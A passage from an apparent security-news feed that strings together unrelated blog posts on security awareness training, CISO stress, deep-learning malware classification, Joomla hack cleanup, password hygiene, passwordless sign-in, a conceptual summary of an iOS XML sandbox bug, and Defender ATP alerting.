For Security Professionals, we have created a simple way to host and deliver the training material within your own environment or direct your users to the M365 security portal, where the trainings are hosted as seen below. All authenticated M365 users will be able to access the training on the portal. Admins will see the option to download the kit as well. Follow the simple steps, detailed in the README, to deploy the awareness kits to your remote workforce.

ACCESSING THE KIT

All Microsoft 365 customers can access the kit and directions on the Microsoft 365 Security and Compliance Center through this link. If you are not a Microsoft 365 customer or would like to share the training with family and friends who are not employees of your organization, Terranova Security is providing free training material for end-users.

Deploying quick and effective end-user training to empower your remote workforce is one of the ways Microsoft can help customers work productively and securely through COVID-19. For more resources to help you through these times, Microsoft’s Secure Remote Work Page for the latest information.

The post Empowering your remote workforce with end-user security awareness appeared first on Microsoft Security.

CISO stress-busters: post #1 overcoming obstacles

As part of the launch of the U.S. space program’s moon shot, President Kennedy famously said we do these things “not because they are easy, but because they are hard.” The same can be said for the people responsible for security at their organizations; it is not a job one takes because it is easy. But it is critically important to keep our digital lives and work safe. And for the CISOs and leaders of the world, it is a job that is more than worth the hardships.

Recent research from Nominet paints a concerning picture of a few of those hardships. Forty-eight percent of CISO respondents indicated work stress had negatively impacted their mental health, this is almost double the number from last year’s survey. Thirty-one percent reported job stress had negatively impacted their physical health and 40 percent have seen their job stress impacting their personal lives. Add a fairly rapid churn rate (26 months on average) to all that stress and it’s clear CISOs are managing a tremendous amount of stress every day. And when crises hit, from incident response after a breach to a suddenly remote workforce after COVID-19, that stress only shoots higher.

Which is why we’re starting this new blog series called “CISO stress-busters.” In the words of CISOs from around the globe, we’ll be sharing insights, guidance, and support from peers on the front lines of the cyber workforce. Kicking us off—the main challenges that CISOs face and how they turn those obstacles into opportunity. The goal of the series is to be a bit of chicken (or chik’n for those vegans out there) soup for the CISO’s soul.

Today’s post features wisdom from three CISOs/Security Leaders:

  • TM Ching, Security CTO at DXC Technology
  • Jim Eckart, (former) CISO at Coca-Cola
  • Jason Golden, CISO at Mainstay Technologies

Clarifying contribution

Ask five different CEOs what their CISOs do and after the high level “manage security” answer you’ll probably get five very different explanations. This is partly because CISO responsibility can vary widely from company to company. So, it’s no surprise that many of the CISOs we interviewed touched on this point.

TM Ching summed it up this way, “Demonstrating my role to the organization can be a challenge—a role like mine may be perceived as symbolic” or that security is just here to “slow things down.” For Jason, “making sure that business leaders understand the difference between IT Operations, Cybersecurity, and InfoSec” can be difficult because execs “often think all of those disciplines are the same thing” and that since IT Ops has the products and solutions, they own security. Jim also bumped up against confusion about the security role with multiple stakeholders pushing and pulling in different directions like “a CIO who says ‘here is your budget,’ a CFO who says ‘why are you so expensive?’ and a general counsel who says ‘we could be leaking information everywhere.'”

What works:

  • Educate Execs—about the role of a CISO. Helping them “understand that it takes a program, that it’s a discipline.” One inflection point is after a breach, “you may be sitting there with an executive, the insurance company, their attorneys, maybe a forensics company and it always looks the same. The executive is looking down the table at the wide-eyed IT person saying ‘What happened?’” It’s a opportunity to educate, to help “make sure the execs understand the purpose of risk management.”—Jason Golden.   To see how to do this watch Microsoft CISO Series Episode 2 Part 1:  Security is everyone’s Business
  • Show Don’t Tell—“It is important to constantly demonstrate that I am here to help them succeed, and not to impose onerous compliance requirements that stall their projects.”—TM Ching
  • Accountability Awareness—CISOs do a lot, but one thing they shouldn’t do is to make risk decisions for the business in a vacuum. That’s why it’s critical to align “all stakeholders (IT, privacy, legal, financial, security, etc.) around the fact that cybersecurity and compliance are business risk issues and not IT issues. IT motions are (and should be) purely in response to the business’ decision around risk tolerance.”—Jim Eckart

Exerting influence

Fans of Boehm’s curve know that the earlier security can be introduced into a process, the less expensive it is to fix defects and flaws. But it’s not always easy for CISOs to get security a seat at the table whether it’s early in the ideation process for a new customer facing application or during financial negotiations to move critical workloads to the cloud. As TM put it, “Exerting influence to ensure that projects are secured at Day 0. This is possibly the hardest thing to do.” And because “some business owners do not take negative news very well” telling them their new app baby is “security ugly” the day before launch can be a gruesome task. And as Jason pointed out, “it’s one thing to talk hypothetically about things like configuration management and change management and here are the things that you need to do to meet those controls so you can keep your contract. It’s a different thing to get that embedded in operations so that IT and HR all the way through finance are following the rules for change management and configuration management.”

What Works:

  • Negotiate engagement—To avoid the last minute “gotchas” or bolting on security after a project has deployed, get into the conversation as early as possible. This isn’t easy, but as TM explains, it can be done. “It takes a lot of negotiations to convince stakeholders why it will be beneficial for them in the long run to take a pause and put the security controls in place, before continuing with their projects.”
  • Follow frameworks—Well-known frameworks like the NIST Cybersecurity Framework, NIST SP800-53, and SP800-37 can help CISOs “take things from strategy to operations” by providing baselines and best practices for building security into the entire organization and systems lifecycle. And that will pay off in the long run; “when the auditors come calling, they’re looking for evidence that you’re following your security model and embedding that throughout the organization.” —Jason

Cultivating culture

Wouldn’t it be wonderful if every company had a security mindset and understood the benefits of having a mature, well-funded security and risk management program? If every employee understood what a phish looks like and why they should report it? Unfortunately, most companies aren’t laser focused on security, leaving that education work up to the CISO and their team. And having those conversations with stakeholders that sometimes have conflicting agendas requires technical depth and robust communication skills. That’s not easy. As Jim points out, “it’s a daunting scope of topics to be proficient in at all levels.

What works:

  • Human firewalls—All the tech controls in the world won’t stop 100 percent of attacks, people need to be part of the solution too. “We can address administrative controls, technical controls, physical controls, but you also need to address the culture and human behavior, or the human firewalls. You know you’re only going to be marginally successful if you don’t engage employees too.” —Jason
  • Know your audience—CISOs need to cultivate “depth and breadth. On any given day, I needed to move from board-level conversations (where participants barely understand security) all the way to the depths of zero day vulnerabilities, patching, security architecture.” —Jim

Did you find these insights helpful? What would you tell your fellow CISOs about overcoming obstacles? What works for you? Please reach out to me on LinkedIn and let me know what you thought of this article and if you’re interested in being interviewed for one of our upcoming posts.

The post CISO stress-busters: post #1 overcoming obstacles appeared first on Microsoft Security.

Microsoft researchers work with Intel Labs to explore new deep learning approaches for malware classification

The opportunities for innovative approaches to threat detection through deep learning, a category of algorithms within the larger framework of machine learning, are vast. Microsoft Threat Protection today uses multiple deep learning-based classifiers that detect advanced threats, for example, evasive malicious PowerShell.

In continued exploration of novel detection techniques, researchers from Microsoft Threat Protection Intelligence Team and Intel Labs are collaborating to study new applications of deep learning for malware classification, specifically:

  • Leveraging deep transfer learning technique from computer vision to static malware classification
  • Optimizing deep learning techniques in terms of model size and leveraging platform hardware capabilities to improve execution of deep-learning malware detection approaches

For the first part of the collaboration, the researchers built on Intel’s prior work on deep transfer learning for static malware classification and used a real-world dataset from Microsoft to ascertain the practical value of approaching the malware classification problem as a computer vision task. The basis for this study is the observation that if malware binaries are plotted as grayscale images, the textural and structural patterns can be used to effectively classify binaries as either benign or malicious, as well as cluster malicious binaries into respective threat families.

The researchers used an approach that they called static malware-as-image network analysis (STAMINA). Using the dataset from Microsoft, the study showed that the STAMINA approach achieves high accuracy in detecting malware with low false positives.

The results and further technical details of the research are listed in the paper STAMINA: Scalable deep learning approach for malware classification and set the stage for further collaborative exploration.

The role of static analysis in deep learning-based malware classification

While static analysis is typically associated with traditional detection methods, it remains to be an important building block for AI-driven detection of malware. It is especially useful for pre-execution detection engines: static analysis disassembles code without having to run applications or monitor runtime behavior.

Static analysis produces metadata about a file. Machine learning classifiers on the client and in the cloud then analyze the metadata and determine whether a file is malicious. Through static analysis, most threats are caught before they can even run.

For more complex threats, dynamic analysis and behavior analysis build on static analysis to provide more features and build more comprehensive detection. Finding ways to perform static analysis at scale and with high effectiveness benefits overall malware detection methodologies.

To this end, the research borrowed knowledge from  computer vision domain to build an enhanced static malware detection framework that leverages deep transfer learning to train directly on portable executable (PE) binaries represented as images.

Analyzing malware represented as image

To establish the practicality of the STAMINA approach, which posits that malware can be classified at scale by performing static analysis on malware codes represented as images, the study covered three main steps: image conversion, transfer learning, and evaluation.

Diagram showing the steps for the STAMINA approach: pre-processing, transfer learning, and evaluation

First, the researchers prepared the binaries by converting them into two-dimensional images. This step involved pixel conversion, reshaping, and resizing. The binaries were converted into a one-dimensional pixel stream by assigning each byte a value between 0 and 255, corresponding to pixel intensity. Each pixel stream was then transformed into a two-dimensional image by using the file size to determine the width and height of the image.

The second step was to use transfer learning, a technique for overcoming the isolated learning paradigm and utilizing knowledge acquired for one task to solve related ones. Transfer learning has enjoyed tremendous success within several different computer vision applications. It accelerates training time by bypassing the need to search for optimized hyperparameters and different architectures—all this while maintaining high classification performance. For this study, the researchers used Inception-v1 as the base model.

The study was performed on a dataset of 2.2 million PE file hashes provided by Microsoft. This dataset was temporally split into 60:20:20 segments for training, validation, and test sets, respectively.

Diagram showing a DNN with pre-trained weights on natural images, and the last portion fine-tuned with new data

Finally, the performance of the system was measured and reported on the holdout test set. The metrics captured include recall at specific false positive range, along with accuracy, F1 score, and area under the receiver operating curve (ROC).

Findings

The joint research showed that applying STAMINA to real-world hold-out test data set achieved a recall of 87.05% at 0.1% false positive rate, and 99.66% recall and 99.07% accuracy at 2.58% false positive rate overall. The results certainly encourage the use of deep transfer learning for the purpose of malware classification. It helps accelerate training by bypassing the search for optimal hyperparameters and architecture searches, saving time and compute resources in the process.

The study also highlights the pros and cons of sample-based methods like STAMINA and metadata-based classification methods. For example, STAMINA can go in-depth into samples and extract additional signals that might not be captured in the metadata.  However, for bigger size applications, STAMINA becomes less effective due to limitations in converting billions of pixels into JPEG images and then resizing them. In such cases, metadata-based methods show advantages over our research.

Conclusion and future work

The use of deep learning methods for detecting threats drives a lot of innovation across Microsoft. The collaboration with Intel Labs researchers is just one of the ways in which Microsoft researchers and data scientists continue to explore novel ways to improve security overall.

This joint research is a good starting ground for more collaborative work. For example, the researchers plan to collaborate further on platform acceleration optimizations that can allow deep learning models to be deployed on client machines with minimal performance impact. Stay tuned.

 

Jugal Parikh, Marc Marino

Microsoft Threat Protection Intelligence Team

 

The post Microsoft researchers work with Intel Labs to explore new deep learning approaches for malware classification appeared first on Microsoft Security.

Learn Five Easy Steps To Fix Joomla Hack

When we talk about the second most popular Current Management System (CMS), then Joomla is there. It enables the user to do website publishing conveniently, and it is user-friendly. Although Joomla is one of the most used systems to build sites, there are still chances of a hack. If you are not keeping a check on updating its plugins, then soon you can face such a problem. Therefore you must learn several things related to fix Joomla hack.

You have to learn the fact that a new update comes with some more advanced security tools, which are useful in preventing the hacks. So, if you will keep on using the old version, there are chances that a black hat hacker might get access to your website. Hackers are just like mosquitoes who modifies their skills to get into the system, and only new security tools, which only comes with update can keep them away!

But, in case your website gets hacked, then here are some vital steps, which you can follow and can get from this problem. Here you can learn how to fix Joomla hack.

What Are Signs That A Website Has Been Hacked?

Before you fix Joomla hack, you must have to analyze if your site is hacked or not? Further, you can proceed with the solutions.

  •       Your website is redirecting to spam
  •       Your admin account keeps on logging you out
  •       The bulky and slow loading speed of page
  •       Google check a website for ‘malware’ and ‘phishing’ and then blacklist it
  •       There are undesirable and malicious ads popping up with spam 

Jump Into The Fix Joomla Hack And Malware Removal Process  

If you come across some common indicators like abnormal browser behavior, modified files, and Blacklist warnings by Google and other search engines, then you need to get it fixed soon. Below is the process, which can help you in such a situation!

Fix Joomla hack

The very first step that you should opt for is to clean the full website, on gaining information about potential malware location. Furthermore, it is also very vital to determine if there are any changes in the files. For this, you can make a comparison between the infected files with the previous files saved as backup. It will help you, and you can then remove the malicious files.

By using a database admin panel, like PHPMyAdmin or Adminer, clean the hacked Joomla database. Moving forward, you have to secure all your accounts because many smart hackers intentionally leave backdoors to reaccess your website. That is why you should carefully cleanse the infected files that have the chance to work as a backdoor.

  1. Database Cleanup

The Joomla SQL injection can make new database users; therefore, the first work is to start cleaning infected files. Once you detect the rogue users, immediately delete them using SQL statement Drop user. You can also do the sanitization of the user input, and also prohibit the database permissions to the account. 

  1. Safeguarding the Server

There are always chances of faulty servers to cause damage, even if the installation process is secure. There are many vital points to remember regarding Joomla security, but here are some of the most vital:

  •       Make sure to remove the unused subdomains
  •       Routine check-up of configuration issues
  •       Ensure to close the open ports
  •       Always block the messages that can leak the information
  1. Setting Authorizations

Firstly make sure that no one can executable like .php .aspx etc. Only allow us to upload the images on the server. After this, you can jump forward towards setting the permission for the server. 

Here, you have to ensure that you are using the famed file extensions. Here, you do not have to worry because you can easily get extensions, as Joomla is a pretty bog CMS. It is one of the vital steps to fix Joomla hack because they get updated fast. 

  1. Check Changed Files in Joomla

Usually, the hackers make changes to your original files and add malicious files to it. They inject infected files that help them to get more access over the website. It can cause a problem for you during installation. In such cases, you need to do a fresh installation, and for that, you must have a backup. 

You can use various handy commands to check the modifications done to your files, and that helps to fix Joomla hack.

  1. Check The User Logs

The best way to figure out the root cause of Joomla hack is through the System logs. These help to record all the activities that took place earlier. There is always a recoding request, whenever a SQL Injection or XSS takes place. Not just this, these hackers also try to create new admin accounts. You can follow these vital steps to check any suspicious users:

  •       Start by logging in your Joomla Dashboard.
  •       Next, click Users and pick Manage.
  •       Here you can check for distrustful users who recently registered.
  •       Further, continue to remove the unknown user.
  •       Ensure to check the last date of the user
  •       Seek out for the location where the server logs are stored.
  •       Remove the unknown IPs, if any.

Conclusion

So these were the vital steps to fix Joomla hack. Also, remember the ways to determine if your website is hacked or not!

The post Learn Five Easy Steps To Fix Joomla Hack appeared first on .

68% of Pharma Executives Have Had Credentials Breached Online

The online credentials for 68% of pharmaceutical executives analyzed for a study have been compromised recently.

The study, conducted by cybersecurity firm Blackcloak, found that the email accounts of over two-thirds of pharmaceutical executives had been compromised within the last five to ten years. Of the compromised emails, 57% were found on the dark web and had been either cracked or stored in plaintext format.

While the primary source (85%) of the email account information was a 2015 data breach of the professional social network LinkedIn, Blackcloak CEO Dr. Chris Pierson assigns much of the blame to weaker cybersecurity via personal devices and accounts belonging to executives, referring to it as “the path of least resistance” for hackers.

“Hackers and cybercriminals spot the opportunity to effortlessly gain access and control over the executives’ home network, enabling them to migrate into the company network from that point. Every day the executive brings their company home, where the security controls are nonexistent and weak ‒ so every night, their corporate networks and company are at risk for a cyberattack,” wrote Pierson.

C-suite executives have been a frequent target for hackers and scammers, but Pierson identified some vulnerabilities specific to the pharmaceutical industry.

“In the pharmaceutical world, executives appeared to move from job to job across a tier of companies and with this they brought their old passwords with them and showed consistent use over a period of sometimes 15 years of same and/or similar passwords,” wrote Pierson.

 

The post 68% of Pharma Executives Have Had Credentials Breached Online appeared first on Adam Levin.

What Does Your Password Say About Your Preferences?

Passwords say a lot about us. They speak to what we prioritize, what we hold dear. So when I recently saw my wife’s password included the kids birthdays and not mine, her priorities were pretty clearI sure know where I stand! 

Whether it’s children’s birth dates or dog names, passwords reveal who we are and what we value, as we all incorporate the relevant aspects of our lives into our passwords to make them easier to remember. While convenient, this habit could actually cause some security mishaps.  

As we honor the first Thursday in May, better known as World Password Day, let’s take a step back to examine some of these common password habits as well as discuss some tips users can follow to secure their online accounts from any potential hackers. 

Common Password Habits

As human beings, we like to keep things simple — which isn’t always a bad thing. However, it’s not ideal when it comes to password security. According to Tech Times, a recent worldwide survey conducted by the United Kingdom’s National Cyber Security Centre on the most common passwords revealed that 23.2 million people still have passwords mentioning the classic ‘123456’ and that ‘123456789’ is used by 7.7 million people worldwide.  

Aside from common character sequences, many people (including my wife) also use significant dates or names of their loved ones as passwords. According to another recent study conducted by The Harris Poll in partnership with Google, nearly 60% of people studied said their birthday has been integrated into at least one password, 33% use a pet’s name, and 22% use their own name. Other common habits also include reusing the same password across multiple accounts, writing them down on a piece of paper, keeping them in a file on their computer, or keeping them in a file on Dropbox or a similar platform.  

These shortcuts are understandable, as it can be challenging to recall so many complex passwords. In fact, a previous McAfee survey stated that 26% of individuals would be willing to give up pampering (manicures, pedicures, massages, etc.) if they never had to remember a password again. Additionally, 34% of respondents are most concerned with the ease of remembering their passwords. 

Potential Security Risks

While convenient, these techniques are not exactly foolproof and can lead to some security concerns. That’s because personalized and simple passwords can put our data a bit more at risk – since hackers can usually find information like birthdays, anniversaries, and pet names online. For instance, that harmless Facebook quiz you were thinking of taking to pass the time can actually reveal your personal information to scammers, allowing them to access your online accounts.  

It’s important users are aware of this risk, but especially as we all navigate working from homeAs McAfee’s Raj Samani, Chief Scientist and Fellow, would attest, “Password security is essential, especially with the new normal many organizations and people are facing. Staying aware and educated about proper password hygiene is essential for us to keep our data secure as we are connected more than ever these days.” That starts with forming good password habits. Sorry “baxterthedog1234!” 

Secure Your Online Accounts

In the post-pandemic world, my family, including my young kids, spends 6+ hours online daily. In the last month, m6-year-old created 10+ online accounts to do her schoolwork and play. In this new reality, we all have the chance to build better password habits for ourselves and teach them to our kidsThat doesn’t mean we have to remember 27 completely unique and complex passwords but can instead just adopt a few easy best practices to help keep our credentials safe. Check out the following tips to help secure your online accounts from criminals.  

Use a passphrase

According to ZDNetthe FBI recently found that using a passphrase made up of multiple words in a long string of at least 15 characters is not only more difficult for hackers to crack, but also easier for users to remember. Instead of making a basic password, create a longer passphrase from the lyrics to your favorite song or the ingredients used to make your favorite dish.  

Ensure your passwords are unique

Your password or passphrase should be as unique as the information it’s protecting! If a hacker does manage to guess your password for one of your online accounts, it’s likely that they will check for repeat credentials across multiple sites. By using different passwords or passphrases for your online accounts, you can remain calm and collected knowing that the majority of your data is secure if one of your accounts becomes vulnerable 

Use a password manager

Take your security to the next level with a password manager or a comprehensive security solutionlike McAfee Total Protection, that comes with one. A password manager can help you create strong passwords, remove the hassle of remembering numerous passwords, and log you on to websites automatically. Who says staying secure has to be complicated? 

Use multi-factor authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification like texting or emailing a secure code to verify your identity. Most popular online sites like GmailDropbox, LinkedIn, Facebook, etc. offer multi-factor authentication and it takes just few minutes to set it up. This reduces the risk of successful impersonation by criminals. Mind you, authentication methods are also evolving due to advanced technology like biometrics. Perhaps the day will be renamed to World No Password Day in the future. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post What Does Your Password Say About Your Preferences? appeared first on McAfee Blogs.

Protect your accounts with smarter ways to sign in on World Passwordless Day

As the world continues to grapple with COVID-19, our lives have become increasingly dependent on digital interactions. Operating at home, we’ve had to rely on e-commerce, telehealth, and e-government to manage the everyday business of life. Our daily online usage has increased by over 20 percent. And if we’re fortunate enough to have a job that we can do from home, we’re accessing corporate apps from outside the company firewall.

Whether we’re signing into social media, mobile banking, or our workplace, we’re connecting via online accounts that require a username and password. The more we do online, the more accounts we have. It becomes a hassle to constantly create new passwords and remember them. So, we take shortcuts. According to a Ponemon Institute study, people reuse an average of five total passwords, both business and personal. This is one aspect of human nature that hackers bet on. If they get hold of one password, they know they can use it to pry open more of our digital lives. A single compromised password, then, can create a chain reaction of liability.

No matter how strong or complex a password is, it’s useless if a bad actor can socially engineer it away from us or find it on the dark web. Plus, passwords are inconvenient and a drain on productivity. People spend hours each year signing into applications and recovering or resetting forgotten usernames and passwords. This activity doesn’t make things more secure. It only drives up the costs of service desks.

People today are done with passwords

Users want something easier and more convenient. Administrators want something more secure. We don’t think anyone finds passwords a cause to celebrate. That’s why we’re helping organizations find smarter ways to sign in that users will love and hackers will hate. Our hope is that instead of World Password Day, we’ll start celebrating World Passwordless Day.

Animated Image: People reuse an average of five passwords across their accounts, both business and personal (Ponemon Institute survey/Yubico). Average person has 90 accounts (Thycotic). Fifty-five percent would prefer a method of protecting accounts that doesn’t involve passwords (Ponemon Institute survey/Yubico). Sixty-seven percent of American consumers surveyed by Visa have used biometric authentication and prefer it to passwords. One-hundred million to 150 million people using a passwordless method each month (Microsoft research, April 2020).

Since an average of one in every 250 corporate accounts is compromised each month, we know that relying on passwords isn’t a good enterprise defense strategy. As companies continue to add more business applications to their portfolios, the cost of passwords only goes up. In fact, companies are dedicating 30 to 60 percent of their support desk calls to password resets. Given how ineffective passwords can be, it’s surprising how many companies haven’t turned on multi-factor authentication (MFA) for their customers or employees.

Passwordless technology is here—and users are adopting it as the best experience for strong authentication. Last November at Microsoft Ignite, we shared that more than 100 million people were already signing in using passwordless methods each month. That number has now reached over 150 million people. According to our recent survey, the use of biometrics for work accounts is set to double this year, with nearly a quarter of companies already using or planning to deploy biometrics soon, signaling an increased desire to ditch the eight-character nuisance.

We now have the momentum to push forward initiatives that increase security and reduce cost. New passwordless technologies give users the benefits of MFA in one gesture. To sign in securely with Windows Hello, all you have to do is show your face or press your finger. Microsoft has built support for passwordless authentication into our products and services, including Office, Azure, Xbox, and Github. You don’t even need to create a username anymore—you can use your phone number instead. Administrators can use single sign-on in Azure Active Directory (Azure AD) to enable passwordless authentication for an unlimited number of apps through native functionality in Windows Hello, the phone-as-a-token capabilities in the Microsoft Authenticator app, or security keys built using the FIDO2 open standards.

Of course, we would never advise our customers to try anything we haven’t tried ourselves. We’re always our own first customer. Microsoft’s IT team switched to passwordless authentication and now 90 percent of Microsoft employees sign in without entering a password. As a result, hard and soft costs of supporting passwords fell by 87 percent. We expect other customers will experience similar benefits in employee productivity improvements, lower IT costs, and a stronger security posture. To learn more about our approach, watch the CISO spotlight episode with Bret Arsenault (Microsoft CISO) and myself. By taking this approach 18 months ago, we were better set up for seamless secure remote work during COVID 19.

For many of us, working from home will be a new norm for the foreseeable future. We see many opportunities for using passwordless methods to better secure digital accounts that people rely on every day. Whether you’re protecting an organization or your own digital life, every step towards passwordless is a step towards improving your security posture. Now let’s embrace the world of passwordless!

Related articles

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protect your accounts with smarter ways to sign in on World Passwordless Day appeared first on Microsoft Security.

iOS XML Bug

This is a good explanation of an iOS bug that allowed someone to break out of the application sandbox. A summary:

What a crazy bug, and Siguza's explanation is very cogent. Basically, it comes down to this:

  • XML is terrible.
  • iOS uses XML for Plists, and Plists are used everywhere in iOS (and MacOS).
  • iOS's sandboxing system depends upon three different XML parsers, which interpret slightly invalid XML input in slightly different ways.

So Siguza's exploit ­-- which granted an app full access to the entire file system, and more ­- uses malformed XML comments constructed in a way that one of iOS's XML parsers sees its declaration of entitlements one way, and another XML parser sees it another way. The XML parser used to check whether an application should be allowed to launch doesn't see the fishy entitlements because it thinks they're inside a comment. The XML parser used to determine whether an already running application has permission to do things that require entitlements sees the fishy entitlements and grants permission.

This is fixed in the new iOS release, 13.5 beta 3.

Comment:

Implementing 4 different parsers is just asking for trouble, and the "fix" is of the crappiest sort, bolting on more crap to check they're doing the right thing in this single case. None of this is encouraging.

More commentary. Hacker News thread.

World Password Day 2020

Are Your Password Habits Keeping You Safe Online?

Learning how to navigate our entire lives online has definitely been a steep learning curve for many of us over the last few weeks. Whether it’s working from home, helping our kids learn from home, conducting ‘wine time’ from home or even doing our Zumba classes from home – it’s essential now more than ever that we are doing this safely. And one of the most powerful yet simple ways we can ‘sure-up’ our online safety is by being smart with our passwords.

World Password Day – Take A Minute To Check Your Approach

Today is World Password Day – the perfect opportunity to ensure we are doing all we can to manage our online logins. It’s quite unsettling to think that one of the easiest ways for cybercriminals to get their hands on the sensitive information we store in our online accounts is through our passwords.

Passwords act like a key to our digital identity. Not only do they allow us to bank, shop, work, learn, date and socialise online but they also protect us as well. Strong, complex passwords ensure all the information we store online (aka our digital assets) are protected which is essential for our privacy and financial and personal security.

So, let’s use this annual event to make sure we are doing all we can to lock down our precious online data by managing our passwords properly.

Same Password For Every Account? – Rookie Error

If I had to count up all my online accounts on my fingers and toes, I would quickly run out of body parts! With so many logins to remember, many of us end of using the same password for every account. And while that might seem so practical it, in fact, makes us very vulnerable. Just think about this scenario: if you become the victim of an online scam and the password to one of your online accounts is stolen, then a cybercriminal can then use this same password to access all your online accounts.

So, before you know it, a cybercriminal can access your emails, bank accounts, online shopping accounts – that may have stored credit cards, private photo and video files.

What You Can Do TODAY to Ensure your Password Habits are Keeping you Safe

Yes, we are all human which means we are going to take shortcuts. I get it! I love shortcuts – I’m a fan of using pasta sauce from the jar! But if there’s one area where shortcuts should NOT be used it’s with passwords. So, here are my top suggestions on how you can stop your private online data falling into the wrong hands and block cybercriminals at the very first point of entry.

  1. Commit to NOT Using Common Passwords

If your password is ‘123456’ then you need to change it now. The UK’s National Cyber Safety Centre showed in a survey last year that this is the most commonly used password. In fact, in the eight years since I’ve been doing this job, this password has annually topped surveys.

Passwords are the gateway to our digital lives. To avoid giving the wrong people access to your accounts, make sure you create strong and unique passwords. This means including numbers, lowercase and uppercase letters and symbols. The more complex your password, the more difficult it is to crack. Why not create a nonsensical phrase or sentence? And always avoid using simple personal details within your password altogether. Your date of birth, middle name or pet names are things cybercriminals can trace through your social media accounts.

  1. Same Password For Every Account? Think Again

The idea of having one password across all online accounts is alluring because let’s admit it…we’ve all been locked out of an account after failing to remember the password! While having one password to remember for all accounts seems to make life easier, it increases the risk of your vital online data being compromised at once across different accounts. So, ensure that your logins are unique for every account to avoid having all your accounts becoming vulnerable in case you are hacked.

  1. ALWAYS Select Multi-Factor Authentication

Wherever possible, embrace multifactor authentication (MFA) for online accounts. MFA is a security system that requires more than one way of identification before gaining access to an account. Most commonly, it involves a security code sent to your smartphone, security questions or even a fingerprint, on top of the password. An extra layer of defence to stop sham access to vital online data? Yes please!

  1. Give Your Passwords a Health Check

What better way to check the health of your passwords than to see whether they’ve been compromised in a data breach. The website www.haveibeenpwned.com.au is an effective way to check whether a cybercriminal has discovered your passwords. If yes, give your passwords an overhaul and change them wherever they are used to safeguard your data.

  1. Employ A Password Manager

If you are currently feeling a tad overwhelmed at the thought of creating and managing unique passwords for your multiple online accounts, do not stress – I have a solution – a password manager. This marvellous software program will create random and complex passwords for each of your accounts and store them securely which means you don’t need to! All you need to do is remember the master password!! When choosing a password manager, ensure it uses multi-factor authentication to identify you eg facial recognition, fingerprint and a password.

If you have a spare 30 minutes today then please take the time to give your password habits an overhaul. I know we are all so flat out juggling work and kids at the moment but a careless approach to password security is no different to a careless approach to home security. So, get your passwords working for you so you can continue living your life online – especially Friday night ‘virtual drinks’!!

 

 

The post World Password Day 2020 appeared first on McAfee Blogs.

How to gain 24/7 detection and response coverage with Microsoft Defender ATP

This blog post is part of the Microsoft Intelligence Security Association guest blog series. To learn more about MISA, go here.

Whether you’re a security team of one or a dozen, detecting and stopping threats around the clock is a challenge. Security incidents don’t happen exclusively during business hours: attackers often wait until the late hours of the night to breach an environment.

At Red Canary, we work with security teams of all shapes and sizes to improve detection and response capabilities. Our Security Operations Team investigates threats in customer environments 24/7/365, removes false positives, and delivers confirmed threats with context. We’ve seen teams run into a wide range of issues when trying to establish after-hours coverage on their own, including:

  • For global enterprises, around-the-clock monitoring can significantly increase the pressure on a U.S.–based security team. If you have personnel around the world, a security team in a single time zone isn’t sufficient to cover the times that computing assets are used in those environments.
  • In smaller companies that don’t have global operations, the security team is more likely to be understaffed and unable to handle 24/7 security monitoring without stressful on-call schedules.
  • For the security teams of one, being “out of office” is a foreign concept. You’re always on. And you need to set up some way to monitor the enterprise while you’re away.

Microsoft Defender Advanced Threat Protection (ATP) is an industry leading endpoint security solution that’s built into Windows with extended capabilities to Mac and Linux servers. Red Canary unlocks the telemetry delivered from Microsoft Defender ATP and investigates every alert, enabling you to immediately increase your detection coverage and waste no time with false positives.

Here’s how those who haven’t started with Red Canary yet can answer the question, “How can I support my 24/7 security needs with Microsoft Defender ATP?”

No matter how big your security team is, the most important first step is notifying the right people based on an on-call schedule. In this post, we’ll describe two different ways of getting Microsoft Defender ATP alerts to your team 24×7 and how Red Canary has implemented this for our customers.

Basic 24/7 via email

Microsoft Defender Security Center allows you to send all Microsoft Defender ATP alerts to an email address. You can set up email alerts under Settings → Alert notifications.

MISA1

Email notification settings in Microsoft Defender Security Center.

These emails will be sent to your team and should be monitored for high severity situations after-hours.

If sent to a ticketing system, these emails can trigger tickets or after-hours pages to be created for your security team. We recommend limiting the alerts to medium and high severity so that you won’t be bothered for informational or low alerts.

MISA2

Setting up alert emails in Microsoft Defender ATP to be sent to a ticketing system.

Now any future alerts will create a new ticket in your ticketing system where you can assign security team members to on-call rotations and notify on-call personnel of new alerts (if supported). Once the notification is received by on-call personnel, they would then log into Microsoft Defender’s Security Center for further investigation and triage. 

Enhanced 24/7 via APIs

What if you want to ingest alerts to a system that doesn’t use email? You can do this by using the Microsoft Defender ATP APIs. First, you’ll need to have an authentication token. You can get the token like we do here:

MISA3

API call to retrieve authentication token.

Once you’ve stored the authentication token you can use it to poll the Microsoft Defender ATP API and retrieve alerts from Microsoft Defender ATP. Here’s an example of the code to pull new alerts.

MISA4

API call to retrieve alerts from Microsoft Defender ATP.

The API only returns a subset of the data associated with each alert. Here’s an example of what you might receive.

MISA5

Example of a Microsoft Defender ATP alert returned from the API.

You can then take this data and ingest it into any of your internal tools. You can learn more about how to access Microsoft Defender ATP APIs in the documentation. Please note, the limited information included in an alert email or API response is not enough to triage the behavior. You will still need to log into the Microsoft Defender Security Center to find out what happened and take appropriate action.

24/7 with Red Canary

By enabling Red Canary, you supercharge your Microsoft Defender ATP deployment by adding a proven 24×7 security operations team who are masters at finding and stopping threats, and an automation platform to quickly remediate and get back to business.

Red Canary continuously ingests all of the raw telemetry generated from your instance of Microsoft Defender ATP as the foundation for our service. We also ingest and monitor Microsoft Defender ATP alerts. We then apply thousands of our own proprietary analytics to identify potential threats that are sent 24/7 to a Red Canary detection engineer for review.

Here’s an overview of the process (to go behind the scenes of these operations check out our detection engineering blog series):

MISA6

Managed detection and response with Red Canary.

Red Canary is monitoring your Microsoft Defender ATP telemetry and alerts. If anything is a confirmed threat, our team creates a detection and sends it to you using a built-in automation framework that supports email, SMS, phone, Microsoft Teams/Slack, and more. Below is an example of what one of those detections might look like.

MISA7

Red Canary confirms threats and prioritizes them so you know what to focus on.

